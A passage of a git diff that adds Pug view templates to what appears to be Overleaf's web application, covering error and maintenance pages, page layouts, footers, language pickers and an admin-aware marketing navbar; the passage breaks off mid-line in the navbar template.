+ + .row.text-centered + .col-md-12 + if user.betaProgram + form( + data-ol-regular-form + method="post" + action="/beta/opt-out" + novalidate + ) + input(type="hidden", name="_csrf", value=csrfToken) + .form-group + a( + href="https://forms.gle/CFEsmvZQTAwHCd3X9" + target="_blank" + rel="noopener noreferrer" + ).btn.btn-primary.btn-lg #{translate("give_feedback")} + .form-group + button.btn.btn-secondary-info.btn-secondary.btn-sm( + type="submit" + data-ol-disabled-inflight + ) + span(data-ol-inflight="idle") #{translate("beta_program_opt_out_action")} + span(hidden data-ol-inflight="pending") #{translate("processing")}… + else + form( + data-ol-regular-form + method="post", + action="/beta/opt-in" + ) + input(type="hidden", name="_csrf", value=csrfToken) + .form-group + button.btn.btn-primary( + type="submit" + data-ol-disabled-inflight + ) + span(data-ol-inflight="idle") #{translate("beta_program_opt_in_action")} + span(hidden data-ol-inflight="pending") #{translate("joining")}… + .page-separator + +back-to-btns() diff --git a/services/web/app/views/general/400.pug b/services/web/app/views/general/400.pug new file mode 100644 index 0000000..9fc9782 --- /dev/null +++ b/services/web/app/views/general/400.pug @@ -0,0 +1,31 @@ +extends ../layout/layout-no-js + +block vars + - metadata = { title: 'Something went wrong' } + - bootstrap5PageStatus = 'disabled' + +block body + body.full-height + main.content.content-alt.full-height#main-content + .container.full-height + .error-container.full-height + .error-details + p.error-status Something went wrong, sorry. + p.error-description + | There was a problem with your request. + if(message) + | + | The error is: + if(message) + p.error-box + | #{message} + p.error-description + | Please go back and try again. + | If the problem persists, please contact us at + | + a(href="mailto:" + settings.adminEmail) #{settings.adminEmail} + | . + p.error-actions + a.error-btn(href="javascript:history.back()") Back + |   + a.btn.btn-secondary(href="/") Home diff --git a/services/web/app/views/general/404.pug b/services/web/app/views/general/404.pug new file mode 100644 index 0000000..f4b5800 --- /dev/null +++ b/services/web/app/views/general/404.pug @@ -0,0 +1,14 @@ +extends ../layout-marketing + +block vars + - bootstrap5PageStatus = 'disabled' + +block content + main.content.content-alt#main-content + .container + .error-container + .error-details + p.error-status Not found + p.error-description #{translate("cant_find_page")} + p.error-actions + a.error-btn(href="/") Home diff --git a/services/web/app/views/general/500.pug b/services/web/app/views/general/500.pug new file mode 100644 index 0000000..90cb1e3 --- /dev/null +++ b/services/web/app/views/general/500.pug @@ -0,0 +1,24 @@ +extends ../layout/layout-no-js + +block vars + - metadata = { title: 'Something went wrong' } + - bootstrap5PageStatus = 'disabled' + +block body + body.full-height + main.content.content-alt.full-height#main-content + .container.full-height + .error-container.full-height + .error-details + p.error-status Something went wrong, sorry. + p.error-description Our staff are probably looking into this, but if it continues, please check our status page at + | + | + a(href="http://" + settings.statusPageUrl) #{settings.statusPageUrl} + | + | or contact us at + | + a(href="mailto:" + settings.adminEmail) #{settings.adminEmail} + | . 
+ p.error-actions + a.error-btn(href="/") Home diff --git a/services/web/app/views/general/closed.pug b/services/web/app/views/general/closed.pug new file mode 100644 index 0000000..f401299 --- /dev/null +++ b/services/web/app/views/general/closed.pug @@ -0,0 +1,22 @@ +extends ../layout-marketing + +block vars + - bootstrap5PageStatus = 'disabled' + +block content + main.content#main-content + .container + .row + .col-md-8.col-md-offset-2.text-center + .page-header + h1 Maintenance + p + if settings.statusPageUrl + | #{settings.appName} is currently down for maintenance. + | Please check our #[a(href='https://' + settings.statusPageUrl) status page] + | for updates. + else + | #{settings.appName} is currently down for maintenance. + | We should be back within minutes, but if not, or you have + | an urgent request, please contact us at + |  #{settings.adminEmail} diff --git a/services/web/app/views/general/post-gateway.pug b/services/web/app/views/general/post-gateway.pug new file mode 100644 index 0000000..dcc8441 --- /dev/null +++ b/services/web/app/views/general/post-gateway.pug @@ -0,0 +1,26 @@ +extends ../layout-marketing + +block vars + - var suppressNavbar = true + - var suppressFooter = true + - var suppressSkipToContent = true + - var suppressCookieBanner = true + - bootstrap5PageStatus = 'disabled' + +block content + .content.content-alt + .container + .row + .col-md-6.col-md-offset-3 + .card + p.text-center #{translate('processing_your_request')} + + form( + data-ol-regular-form + data-ol-auto-submit + method="POST" + ) + input(name="_csrf" type="hidden" value=csrfToken) + input(hidden name="viaGateway" type="submit" value="true") + for name in Object.keys(form_data) + input(name=name type="hidden" value=form_data[name]) diff --git a/services/web/app/views/general/unsupported-browser.pug b/services/web/app/views/general/unsupported-browser.pug new file mode 100644 index 0000000..f8806cf --- /dev/null +++ b/services/web/app/views/general/unsupported-browser.pug @@ -0,0 +1,46 @@ +extends ../layout/layout-no-js + +block vars + - metadata = { title: 'Unsupported browser' } + - bootstrap5PageStatus = 'disabled' + +block body + body.full-height + main.content.content-alt.full-height#main-content + .container.full-height + .error-container.full-height + .error-details + h1.error-status Unsupported Browser + p.error-description + | Sorry, we don't support your browser anymore. Please see below what browsers we support. + br + | If you think you're seeing this message in error, + | + a(href="mailto:" + settings.adminEmail) please let us know + | . + + if fromURL + p + | URL: + | + a(href=fromURL) #{fromURL} + + hr + + p + | Overleaf officially supports versions of Chrome, Firefox, Safari and Microsoft Edge released in the last 12 months. + br + | Firefox ESR is also supported for 12 months. + p + | Support for beta or developer-preview browser versions cannot be guaranteed. Please + | + a(href="mailto:" + settings.adminEmail) get in touch + | + | if you encounter any issues while using the service with beta or developer-preview releases of supported browsers. + p + strong Overleaf has stopped supporting Internet Explorer as of April 26, 2021, and access is now blocked. + p + | If you cannot upgrade to one of the supported browsers, + | + a(href="mailto:" + settings.adminEmail) please let us know + | . 
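The post-gateway page above renders the captured form_data as hidden inputs and tags the form with data-ol-auto-submit; the client-side code that acts on that attribute is not included in this diff. A plausible minimal binding, with only the attribute name taken from the template and the rest an assumption:

// Assumed binding for data-ol-auto-submit (not part of this commit):
// once the DOM is ready, submit the flagged form so the captured POST
// continues to its destination without user interaction.
window.addEventListener('DOMContentLoaded', function () {
  var form = document.querySelector('form[data-ol-auto-submit]')
  if (form) form.submit()
})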
diff --git a/services/web/app/views/layout-base.pug b/services/web/app/views/layout-base.pug new file mode 100644 index 0000000..0493281 --- /dev/null +++ b/services/web/app/views/layout-base.pug @@ -0,0 +1,112 @@ +include ./_mixins/foot_scripts + +doctype html +html( + lang=(currentLngCode || 'en') + class=(fixedSizeDocument ? 'fixed-size-document' : undefined) +) + - metadata = metadata || {} + - let bootstrap5PageStatus = 'enabled' // One of 'disabled' and 'enabled' + - let bootstrap5PageSplitTest = '' // Limits Bootstrap 5 usage on this page to users with an assignment of "enabled" for the specified split test. If left empty and bootstrap5PageStatus is "enabled", the page always uses Bootstrap 5. + - let isWebsiteRedesign = false + - let isApplicationPage = false + - let enableIeeeBranding = true + + block entrypointVar + + block isApplicationPageVar + + block vars + + head + include ./_metadata.pug + + - const bootstrapVersion = bootstrap5PageStatus !== 'disabled' && (bootstrap5Override || bootstrap5PageSplitTest === '' || splitTestVariants[bootstrap5PageSplitTest] === 'enabled') ? 5 : 3 + + //- Stylesheet + link(rel='stylesheet', href=buildCssPath(getCssThemeModifier(userSettings, brandVariation, enableIeeeBranding), bootstrapVersion), id="main-stylesheet") + block css + each file in entrypointStyles(entrypoint) + link(rel='stylesheet', href=file) + + block _headLinks + + if (typeof suppressRelAlternateLinks == "undefined") + if settings.i18n.subdomainLang + each subdomainDetails in settings.i18n.subdomainLang + if !subdomainDetails.hide + link(rel="alternate", href=subdomainDetails.url + currentUrl, hreflang=subdomainDetails.lngCode) + + if (entrypoint !== 'marketing') + link(rel="preload", href=buildJsPath(currentLngCode + "-json.js"), as="script", nonce=scriptNonce) + + //- Scripts + if (typeof suppressGoogleAnalytics == "undefined") + include _google_analytics + + block meta + meta(name="ol-csrfToken" content=csrfToken) + //- Configure dynamically loaded assets (via webpack) to be downloaded from CDN + //- See: https://webpack.js.org/guides/public-path/#on-the-fly + meta(name="ol-baseAssetPath" content=buildBaseAssetPath()) + meta(name="ol-mathJaxPath" content=mathJaxPath) + meta(name="ol-dictionariesRoot" content=dictionariesRoot) + + meta(name="ol-usersEmail" content=getUserEmail()) + meta(name="ol-ab" data-type="json" content={}) + meta(name="ol-user_id" content=getLoggedInUserId()) + //- Internationalisation settings + meta(name="ol-i18n" data-type="json" content={ + currentLangCode: currentLngCode + }) + //- Expose some settings globally to the frontend + meta(name="ol-ExposedSettings" data-type="json" content=ExposedSettings) + meta(name="ol-splitTestVariants" data-type="json" content=splitTestVariants || {}) + meta(name="ol-splitTestInfo" data-type="json" content=splitTestInfo || {}) + + if (typeof settings.algolia != "undefined") + meta(name="ol-algolia" data-type="json" content={ + appId: settings.algolia.app_id, + apiKey: settings.algolia.read_only_api_key, + indexes: settings.algolia.indexes + }) + + meta(name="ol-isManagedAccount" data-type="boolean" content=isManagedAccount) + each restriction in userRestrictions || [] + meta(name='ol-cannot-' + restriction data-type="boolean" content=true) + meta(name="ol-bootstrapVersion" data-type="json" content=bootstrapVersion) + + block head-scripts + + body(class={ + 'thin-footer': showThinFooter, + 'website-redesign': isWebsiteRedesign === true || websiteRedesignOverride, + 'application-page': isApplicationPage + }, 
data-theme="default") + if(settings.recaptcha && settings.recaptcha.siteKeyV3) + script(type="text/javascript", nonce=scriptNonce, src="https://www.recaptcha.net/recaptcha/api.js?render=" + settings.recaptcha.siteKeyV3, defer=deferScripts) + + if (typeof suppressSkipToContent == "undefined") + a(class="skip-to-content" href="#main-content") #{translate('skip_to_content')} + + block body + + if (settings.devToolbar.enabled) + div#dev-toolbar + + block foot-scripts + +foot-scripts + + include _customer_io + + script(type="text/javascript", nonce=scriptNonce). + window.addEventListener('DOMContentLoaded', function() { + //- Look for bundle + var cdnBlocked = typeof Frontend === 'undefined' + //- Prevent loops + var noCdnAlreadyInUrl = window.location.href.indexOf("nocdn=true") != -1 + if (cdnBlocked && !noCdnAlreadyInUrl && navigator.userAgent.indexOf("Googlebot") == -1) { + //- Set query param, server will not set CDN url + window.location.search += "&nocdn=true"; + } + }) diff --git a/services/web/app/views/layout-marketing.pug b/services/web/app/views/layout-marketing.pug new file mode 100644 index 0000000..20126be --- /dev/null +++ b/services/web/app/views/layout-marketing.pug @@ -0,0 +1,36 @@ +extends ./layout-base + +include ./_mixins/formMessages +include ./_mixins/bootstrap_js + +block entrypointVar + - entrypoint = 'marketing' + +block body + if (typeof suppressNavbar === "undefined") + if bootstrapVersion === 5 + include layout/navbar-marketing-bootstrap-5 + else + include layout/navbar-marketing + + block content + + if (typeof suppressFooter === "undefined") + if showThinFooter + if bootstrapVersion === 5 + include layout/thin-footer-bootstrap-5 + else + include layout/thin-footer + else + include layout/fat-footer + + if (typeof(suppressCookieBanner) == 'undefined') + include _cookie_banner + + if bootstrapVersion === 5 + != moduleIncludes("contactModal-marketing-bootstrap-5", locals) + else + != moduleIncludes("contactModal-marketing", locals) + +block prepend foot-scripts + +bootstrap-js(bootstrapVersion) diff --git a/services/web/app/views/layout-react.pug b/services/web/app/views/layout-react.pug new file mode 100644 index 0000000..f3dc8e6 --- /dev/null +++ b/services/web/app/views/layout-react.pug @@ -0,0 +1,83 @@ +//- This is used for pages that are migrated to Bootstrap 5 but don't use Bootstrap's own JS, instead using +//- react-bootstrap for all Bootstrap components +extends ./layout-base + +include ./_mixins/formMessages +include ./_mixins/bootstrap_js + +block entrypointVar + - entrypoint = 'marketing' + +block isApplicationPageVar + - isApplicationPage = true + +block append meta + if bootstrapVersion === 5 + - const canDisplayAdminMenu = hasAdminAccess() + - const canDisplayAdminRedirect = canRedirectToAdminDomain() + - const sessionUser = getSessionUser() + - const staffAccess = sessionUser?.staffAccess + - const canDisplaySplitTestMenu = hasFeature('saas') && (canDisplayAdminMenu || staffAccess?.splitTestMetrics || staffAccess?.splitTestManagement) + - const canDisplaySurveyMenu = hasFeature('saas') && canDisplayAdminMenu + - const canDisplayScriptLogMenu = hasFeature('saas') && canDisplayAdminMenu + - const enableUpgradeButton = projectDashboardReact && usersBestSubscription && (usersBestSubscription.type === 'free' || usersBestSubscription.type === 'standalone-ai-add-on') + - const showSignUpLink = hasFeature('registration-page') + + meta(name="ol-navbar" data-type="json" content={ + customLogo: settings.nav.custom_logo, + title: nav.title, + canDisplayAdminMenu, 
+ canDisplayAdminRedirect, + canDisplaySplitTestMenu, + canDisplaySurveyMenu, + canDisplayScriptLogMenu, + enableUpgradeButton, + suppressNavbarRight: !!suppressNavbarRight, + suppressNavContentLinks: !!suppressNavContentLinks, + showSubscriptionLink: nav.showSubscriptionLink, + showSignUpLink: showSignUpLink, + currentUrl: currentUrl, + sessionUser: sessionUser ? { email: sessionUser.email} : undefined, + adminUrl: settings.adminUrl, + items: cloneAndTranslateText(nav.header_extras) + }) + meta(name="ol-footer" data-type="json" content={ + showThinFooter: showThinFooter, + showPoweredBy: !hasFeature('saas') && !settings.nav.hide_powered_by, + subdomainLang: settings.i18n.subdomainLang, + translatedLanguages: settings.translatedLanguages, + leftItems: cloneAndTranslateText(settings.nav.left_footer), + rightItems: settings.nav.right_footer + }) + +block body + if (typeof suppressNavbar === "undefined") + if bootstrapVersion === 5 + include layout/navbar-marketing-react-bootstrap-5 + else + include layout/navbar-marketing + + block content + + if (typeof suppressFooter === "undefined") + if showThinFooter + if bootstrapVersion === 5 + include layout/thin-footer-bootstrap-5 + else + include layout/thin-footer + else + if bootstrapVersion === 5 + include layout/fat-footer-react-bootstrap-5 + else + include layout/fat-footer + + if (typeof suppressCookieBanner === "undefined") + include _cookie_banner + + if bootstrapVersion === 3 + != moduleIncludes("contactModal-marketing", locals) + +block prepend foot-scripts + //- Only include Bootstrap JS if using Bootstrap 3 + if bootstrapVersion === 3 + +bootstrap-js(3) diff --git a/services/web/app/views/layout-website-redesign-bootstrap-5.pug b/services/web/app/views/layout-website-redesign-bootstrap-5.pug new file mode 100644 index 0000000..e6dc3a8 --- /dev/null +++ b/services/web/app/views/layout-website-redesign-bootstrap-5.pug @@ -0,0 +1,28 @@ +extends ./layout-base + +include ./_mixins/formMessages +include ./_mixins/bootstrap_js + +block entrypointVar + - entrypoint = 'marketing' + - isWebsiteRedesign = true + +block body + if (typeof(suppressNavbar) == "undefined") + include layout/navbar-marketing-bootstrap-5 + + block content + + if (typeof(suppressFooter) == "undefined") + if showThinFooter + include layout/thin-footer-bootstrap-5 + else + include layout/fat-footer-website-redesign + + if (typeof(suppressCookieBanner) == 'undefined') + include _cookie_banner + + != moduleIncludes("contactModal-marketing-bootstrap-5", locals) + +block prepend foot-scripts + +bootstrap-js(5) diff --git a/services/web/app/views/layout-website-redesign.pug b/services/web/app/views/layout-website-redesign.pug new file mode 100644 index 0000000..37ba2f9 --- /dev/null +++ b/services/web/app/views/layout-website-redesign.pug @@ -0,0 +1,27 @@ +extends ./layout-base + +include ./_mixins/formMessages +include ./_mixins/bootstrap_js + +block entrypointVar + - entrypoint = 'marketing' + +block body + if (typeof(suppressNavbar) == "undefined") + include layout/navbar-website-redesign + + block content + + if (typeof(suppressFooter) == "undefined") + if showThinFooter + include layout/thin-footer + else + include layout/fat-footer-website-redesign + + if (typeof(suppressCookieBanner) == 'undefined') + include _cookie_banner + + != moduleIncludes("contactModal-marketing", locals) + +block prepend foot-scripts + +bootstrap-js(bootstrapVersion) diff --git a/services/web/app/views/layout/fat-footer-base.pug b/services/web/app/views/layout/fat-footer-base.pug new file mode 
100644 index 0000000..2e3dd20 --- /dev/null +++ b/services/web/app/views/layout/fat-footer-base.pug @@ -0,0 +1,32 @@ +.fat-footer-base + .fat-footer-base-section.fat-footer-base-meta + .fat-footer-base-item + .fat-footer-base-copyright © #{new Date().getFullYear()} Overleaf + a(href="/legal") #{translate('privacy_and_terms')} + a(href="https://www.digital-science.com/security-certifications/") #{translate('compliance')} + ul.fat-footer-base-item.list-unstyled.fat-footer-base-language + if bootstrapVersion === 5 + include language-picker-bootstrap-5 + else + include language-picker + .fat-footer-base-section.fat-footer-base-social + .fat-footer-base-item + a.fat-footer-social.x-logo(href="https://x.com/overleaf") + svg(xmlns="http://www.w3.org/2000/svg" viewBox="0 0 1200 1227" height="25") + path(d="M714.163 519.284L1160.89 0H1055.03L667.137 450.887L357.328 0H0L468.492 681.821L0 1226.37H105.866L515.491 750.218L842.672 1226.37H1200L714.137 519.284H714.163ZM569.165 687.828L521.697 619.934L144.011 79.6944H306.615L611.412 515.685L658.88 583.579L1055.08 1150.3H892.476L569.165 687.854V687.828Z") + span.visually-hidden #{translate("app_on_x", {social: "X"})} + a.fat-footer-social.facebook-logo(href="https://www.facebook.com/overleaf.editor") + svg(xmlns="http://www.w3.org/2000/svg" viewBox="0 0 666.66668 666.66717" height="25") + defs + clipPath(id="a" clipPathUnits="userSpaceOnUse") + path(d="M0 700h700V0H0Z") + g(clip-path="url(#a)" transform="matrix(1.33333 0 0 -1.33333 -133.333 800)") + path.background(d="M0 0c0 138.071-111.929 250-250 250S-500 138.071-500 0c0-117.245 80.715-215.622 189.606-242.638v166.242h-51.552V0h51.552v32.919c0 85.092 38.508 124.532 122.048 124.532 15.838 0 43.167-3.105 54.347-6.211V81.986c-5.901.621-16.149.932-28.882.932-40.993 0-56.832-15.528-56.832-55.9V0h81.659l-14.028-76.396h-67.631v-171.773C-95.927-233.218 0-127.818 0 0" fill="#0866ff" transform="translate(600 350)") + path.text(d="m0 0 14.029 76.396H-67.63v27.019c0 40.372 15.838 55.899 56.831 55.899 12.733 0 22.981-.31 28.882-.931v69.253c-11.18 3.106-38.509 6.212-54.347 6.212-83.539 0-122.048-39.441-122.048-124.533V76.396h-51.552V0h51.552v-166.242a250.559 250.559 0 0 1 60.394-7.362c10.254 0 20.358.632 30.288 1.831V0Z" fill="#fff" transform="translate(447.918 273.604)") + span.visually-hidden #{translate("app_on_x", {social: "Facebook"})} + a.fat-footer-social.linkedin-logo(href="https://www.linkedin.com/company/writelatex-limited") + svg(xmlns="http://www.w3.org/2000/svg" viewBox="0 0 72 72" height="25") + g(fill="none" fill-rule="evenodd") + path.background(fill="#0B66C3" d="M8 72h56a8 8 0 0 0 8-8V8a8 8 0 0 0-8-8H8a8 8 0 0 0-8 8v56a8 8 0 0 0 8 8") + path.text(fill="#FFF" d="M62 62H51.316V43.802c0-4.99-1.896-7.777-5.845-7.777-4.296 0-6.54 2.901-6.54 7.777V62H28.632V27.333H38.93v4.67s3.096-5.729 10.453-5.729c7.353 0 12.617 4.49 12.617 13.777zM16.35 22.794c-3.508 0-6.35-2.864-6.35-6.397C10 12.864 12.842 10 16.35 10c3.507 0 6.347 2.864 6.347 6.397 0 3.533-2.84 6.397-6.348 6.397ZM11.032 62h10.736V27.333H11.033V62") + span.visually-hidden #{translate("app_on_x", {social: "LinkedIn"})} diff --git a/services/web/app/views/layout/fat-footer-react-bootstrap-5.pug b/services/web/app/views/layout/fat-footer-react-bootstrap-5.pug new file mode 100644 index 0000000..95b2605 --- /dev/null +++ b/services/web/app/views/layout/fat-footer-react-bootstrap-5.pug @@ -0,0 +1 @@ +#footer-container diff --git a/services/web/app/views/layout/fat-footer-website-redesign.pug b/services/web/app/views/layout/fat-footer-website-redesign.pug new 
file mode 100644 index 0000000..bde9113 --- /dev/null +++ b/services/web/app/views/layout/fat-footer-website-redesign.pug @@ -0,0 +1,84 @@ +footer.fat-footer.hidden-print.website-redesign-fat-footer + .fat-footer-container(role="navigation" aria-label=translate('footer_navigation')) + .fat-footer-sections(class=hideFatFooter ? 'hidden' : undefined) + .footer-section#footer-brand + a(href='/', aria-label=settings.appName).footer-brand + + .footer-section + h2.footer-section-heading #{translate('About')} + + ul.list-unstyled + li + a(href="/about") #{translate('footer_about_us')} + li + a(href="/about/values") #{translate('our_values')} + li + a(href="/about/careers") #{translate('careers')} + li + a(href="/for/press") !{translate('press_and_awards')} + li + a(href="/blog") #{translate('blog')} + + .footer-section + h2.footer-section-heading #{translate('learn')} + + ul.list-unstyled + li + a(href="/learn/latex/Learn_LaTeX_in_30_minutes") #{translate('latex_in_thirty_minutes')} + li + a(href="/latex/templates") #{translate('templates')} + li + a(href="/events/webinars") #{translate('webinars')} + li + a(href="/learn/latex/Tutorials") #{translate('tutorials')} + li + a(href="/learn/latex/Inserting_Images") #{translate('how_to_insert_images')} + li + a(href="/learn/latex/Tables") #{translate('how_to_create_tables')} + + .footer-section + h2.footer-section-heading !{translate('footer_plans_and_pricing')} + + ul.list-unstyled + li + a(href="/learn/how-to/Overleaf_premium_features") #{translate('premium_features')} + li + a(href="/user/subscription/plans?itm_referrer=footer-for-indv-groups") !{translate('for_individuals_and_groups')} + li + a(href="/for/enterprises") #{translate('for_business')} + li + a(href="/for/universities") #{translate('for_universities')} + li + a( + data-ol-for-students-link + href="/user/subscription/plans?itm_referrer=footer-for-students#student-annual" + ) #{translate('for_students')} + li + a(href="/for/government") #{translate('for_government')} + + .footer-section + h2.footer-section-heading #{translate('get_involved')} + + ul.list-unstyled + li + a(href="/for/community/advisors") #{translate('become_an_advisor')} + li + a(href="https://forms.gle/67PSpN1bLnjGCmPQ9") #{translate('let_us_know_what_you_think')} + if user + li + a(href="/beta/participate") #{translate('join_beta_program')} + + .footer-section + h2.footer-section-heading #{translate('help')} + + ul.list-unstyled + li + a(href="/about/why-latex") #{translate('why_latex')} + li + a(href="/learn") #{translate('Documentation')} + li + a(href="/contact") #{translate('footer_contact_us')} + li + a(href="https://status.overleaf.com/") #{translate('website_status')} + + include fat-footer-base diff --git a/services/web/app/views/layout/fat-footer.pug b/services/web/app/views/layout/fat-footer.pug new file mode 100644 index 0000000..95de4a3 --- /dev/null +++ b/services/web/app/views/layout/fat-footer.pug @@ -0,0 +1,84 @@ +footer.fat-footer.hidden-print + .fat-footer-container(role="navigation" aria-label=translate('footer_navigation')) + .fat-footer-sections(class=hideFatFooter ? 
'hidden' : undefined) + .footer-section#footer-brand + a(href='/', aria-label=settings.appName).footer-brand + + .footer-section + h2.footer-section-heading #{translate('About')} + + ul.list-unstyled + li + a(href="/about") #{translate('footer_about_us')} + li + a(href="/about/values") #{translate('our_values')} + li + a(href="/about/careers") #{translate('careers')} + li + a(href="/for/press") !{translate('press_and_awards')} + li + a(href="/blog") #{translate('blog')} + + .footer-section + h2.footer-section-heading #{translate('learn')} + + ul.list-unstyled + li + a(href="/learn/latex/Learn_LaTeX_in_30_minutes") #{translate('latex_in_thirty_minutes')} + li + a(href="/latex/templates") #{translate('templates')} + li + a(href="/events/webinars") #{translate('webinars')} + li + a(href="/learn/latex/Tutorials") #{translate('tutorials')} + li + a(href="/learn/latex/Inserting_Images") #{translate('how_to_insert_images')} + li + a(href="/learn/latex/Tables") #{translate('how_to_create_tables')} + + .footer-section + h2.footer-section-heading !{translate('footer_plans_and_pricing')} + + ul.list-unstyled + li + a(href="/learn/how-to/Overleaf_premium_features") #{translate('premium_features')} + li + a(href="/user/subscription/plans?itm_referrer=footer-for-indv-groups") !{translate('for_individuals_and_groups')} + li + a(href="/for/enterprises") #{translate('for_enterprise')} + li + a(href="/for/universities") #{translate('for_universities')} + li + a( + data-ol-for-students-link + href="/user/subscription/plans?itm_referrer=footer-for-students#student-annual" + ) #{translate('for_students')} + li + a(href="/for/government") #{translate('for_government')} + + .footer-section + h2.footer-section-heading #{translate('get_involved')} + + ul.list-unstyled + li + a(href="/for/community/advisors") #{translate('become_an_advisor')} + li + a(href="https://forms.gle/67PSpN1bLnjGCmPQ9") #{translate('let_us_know_what_you_think')} + if user + li + a(href="/beta/participate") #{translate('join_beta_program')} + + .footer-section + h2.footer-section-heading #{translate('help')} + + ul.list-unstyled + li + a(href="/about/why-latex") #{translate('why_latex')} + li + a(href="/learn") #{translate('Documentation')} + li + a(href="/contact") #{translate('footer_contact_us')} + li + a(href="https://status.overleaf.com/") #{translate('website_status')} + + include fat-footer-base diff --git a/services/web/app/views/layout/language-picker-bootstrap-5.pug b/services/web/app/views/layout/language-picker-bootstrap-5.pug new file mode 100644 index 0000000..47a9bc5 --- /dev/null +++ b/services/web/app/views/layout/language-picker-bootstrap-5.pug @@ -0,0 +1,25 @@ +li.dropdown.dropup.subdued(dropdown).language-picker + button#language-picker-toggle.btn.btn-link.btn-inline-link( + dropdown-toggle, + data-ol-lang-selector-tooltip, + data-bs-toggle="dropdown", + aria-haspopup="true", + aria-expanded="false", + aria-label="Select " + translate('language'), + tooltip=translate('language') + title=translate('language') + ) + span.material-symbols(aria-hidden="true") translate + |   + span.language-picker-text #{settings.translatedLanguages[currentLngCode]} + + ul.dropdown-menu.dropdown-menu-sm-width(role="menu" aria-labelledby="language-picker-toggle") + li.dropdown-header #{translate("language")} + each subdomainDetails, subdomain in settings.i18n.subdomainLang + if !subdomainDetails.hide + - let isActive = subdomainDetails.lngCode === currentLngCode + li.lng-option + 
a.menu-indent(href=subdomainDetails.url+currentUrlWithQueryParams, role="menuitem", class=isActive ? 'dropdown-item active' : 'dropdown-item', aria-selected=isActive ? 'true' : 'false') + | #{settings.translatedLanguages[subdomainDetails.lngCode]} + if subdomainDetails.lngCode === currentLngCode + span.material-symbols.dropdown-item-trailing-icon(aria-hidden="true") check diff --git a/services/web/app/views/layout/language-picker.pug b/services/web/app/views/layout/language-picker.pug new file mode 100644 index 0000000..d26d8a8 --- /dev/null +++ b/services/web/app/views/layout/language-picker.pug @@ -0,0 +1,24 @@ +li.dropdown.dropup.subdued(dropdown).language-picker + a.dropdown-toggle#language-picker-toggle( + href="#", + dropdown-toggle, + data-ol-lang-selector-tooltip, + data-toggle="dropdown", + role="button" + aria-haspopup="true", + aria-expanded="false", + aria-label="Select " + translate('language'), + tooltip=translate('language') + title=translate('language') + ) + i.fa.fa-fw.fa-language + | + | #{settings.translatedLanguages[currentLngCode]} + + ul.dropdown-menu(role="menu" aria-labelledby="language-picker-toggle") + li.dropdown-header #{translate("language")} + each subdomainDetails, subdomain in settings.i18n.subdomainLang + if !subdomainDetails.hide + li.lng-option + a.menu-indent(href=subdomainDetails.url+currentUrlWithQueryParams role="menuitem") + | #{settings.translatedLanguages[subdomainDetails.lngCode]} diff --git a/services/web/app/views/layout/layout-no-js.pug b/services/web/app/views/layout/layout-no-js.pug new file mode 100644 index 0000000..c86721a --- /dev/null +++ b/services/web/app/views/layout/layout-no-js.pug @@ -0,0 +1,18 @@ +doctype html +html(lang="en") + + - metadata = metadata || {} + block vars + + head + if (metadata && metadata.title) + title= metadata.title + if metadata && metadata.viewport + meta(name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=yes") + + link(rel="icon", href="/favicon.ico") + + if buildCssPath + link(rel="stylesheet", href=buildCssPath()) + +block body diff --git a/services/web/app/views/layout/navbar-marketing-bootstrap-5.pug b/services/web/app/views/layout/navbar-marketing-bootstrap-5.pug new file mode 100644 index 0000000..ee94394 --- /dev/null +++ b/services/web/app/views/layout/navbar-marketing-bootstrap-5.pug @@ -0,0 +1,201 @@ +include ../_mixins/navbar + +nav.navbar.navbar-default.navbar-main.navbar-expand-lg(class={ + 'website-redesign-navbar': isWebsiteRedesign +}) + .container-fluid.navbar-container + .navbar-header + if settings.nav.custom_logo + a(href='/', aria-label=settings.appName, style='background-image:url("'+settings.nav.custom_logo+'")').navbar-brand + else if (nav.title) + a(href='/', aria-label=settings.appName).navbar-title #{nav.title} + else + a(href='/', aria-label=settings.appName).navbar-brand + + - var enableUpgradeButton = projectDashboardReact && usersBestSubscription && (usersBestSubscription.type === 'free' || usersBestSubscription.type === 'standalone-ai-add-on') + if (enableUpgradeButton) + a.btn.btn-primary.me-2.d-md-none( + href="/user/subscription/plans" + event-tracking="upgrade-button-click" + event-tracking-mb="true" + event-tracking-label="upgrade" + event-tracking-trigger="click" + event-segmentation='{"source": "dashboard-top", "project-dashboard-react": "enabled", "is-dashboard-sidebar-hidden": "true", "is-screen-width-less-than-768px": "true"}' + ) #{translate("upgrade")} + + - var canDisplayAdminMenu = hasAdminAccess() + - var canDisplayAdminRedirect = 
canRedirectToAdminDomain() + - var canDisplaySplitTestMenu = hasFeature('saas') && (canDisplayAdminMenu || (getSessionUser() && getSessionUser().staffAccess && (getSessionUser().staffAccess.splitTestMetrics || getSessionUser().staffAccess.splitTestManagement))) + - var canDisplaySurveyMenu = hasFeature('saas') && canDisplayAdminMenu + - var canDisplayScriptLogMenu = hasFeature('saas') && canDisplayAdminMenu + + if (typeof suppressNavbarRight === "undefined") + button.navbar-toggler.collapsed( + type="button", + data-bs-toggle="collapse", + data-bs-target="#navbar-main-collapse" + aria-controls="navbar-main-collapse" + aria-expanded="false" + aria-label="Toggle " + translate('navigation') + ) + i.fa.fa-bars(aria-hidden="true") + + .navbar-collapse.collapse#navbar-main-collapse + ul.nav.navbar-nav.navbar-right.ms-auto(role="menubar") + if (canDisplayAdminMenu || canDisplayAdminRedirect || canDisplaySplitTestMenu) + +nav-item.dropdown.subdued + button.dropdown-toggle( + aria-haspopup="true", + aria-expanded="false", + data-bs-toggle="dropdown" + role="menuitem" + event-tracking="menu-expand" + event-tracking-mb="true" + event-tracking-trigger="click" + event-segmentation={"item": "admin", "location": "top-menu"} + ) + | Admin + span.caret + +dropdown-menu.dropdown-menu-end + if canDisplayAdminMenu + +dropdown-menu-link-item()(href="/admin") Manage Site + +dropdown-menu-link-item()(href="/admin/user") Manage Users + +dropdown-menu-link-item()(href="/admin/project") Project URL Lookup + if canDisplayAdminRedirect + +dropdown-menu-link-item()(href=settings.adminUrl) Switch to Admin + if canDisplaySplitTestMenu + +dropdown-menu-link-item()(href="/admin/split-test") Manage Feature Flags + if canDisplaySurveyMenu + +dropdown-menu-link-item()(href="/admin/survey") Manage Surveys + if canDisplayScriptLogMenu + +dropdown-menu-link-item()(href="/admin/script-logs") View Script Logs + + // loop over header_extras + each item in nav.header_extras + - + if ((item.only_when_logged_in && getSessionUser()) + || (item.only_when_logged_out && (!getSessionUser())) + || (!item.only_when_logged_out && !item.only_when_logged_in && !item.only_content_pages) + || (item.only_content_pages && (typeof suppressNavContentLinks === "undefined" || !suppressNavContentLinks)) + ){ + var showNavItem = true + } else { + var showNavItem = 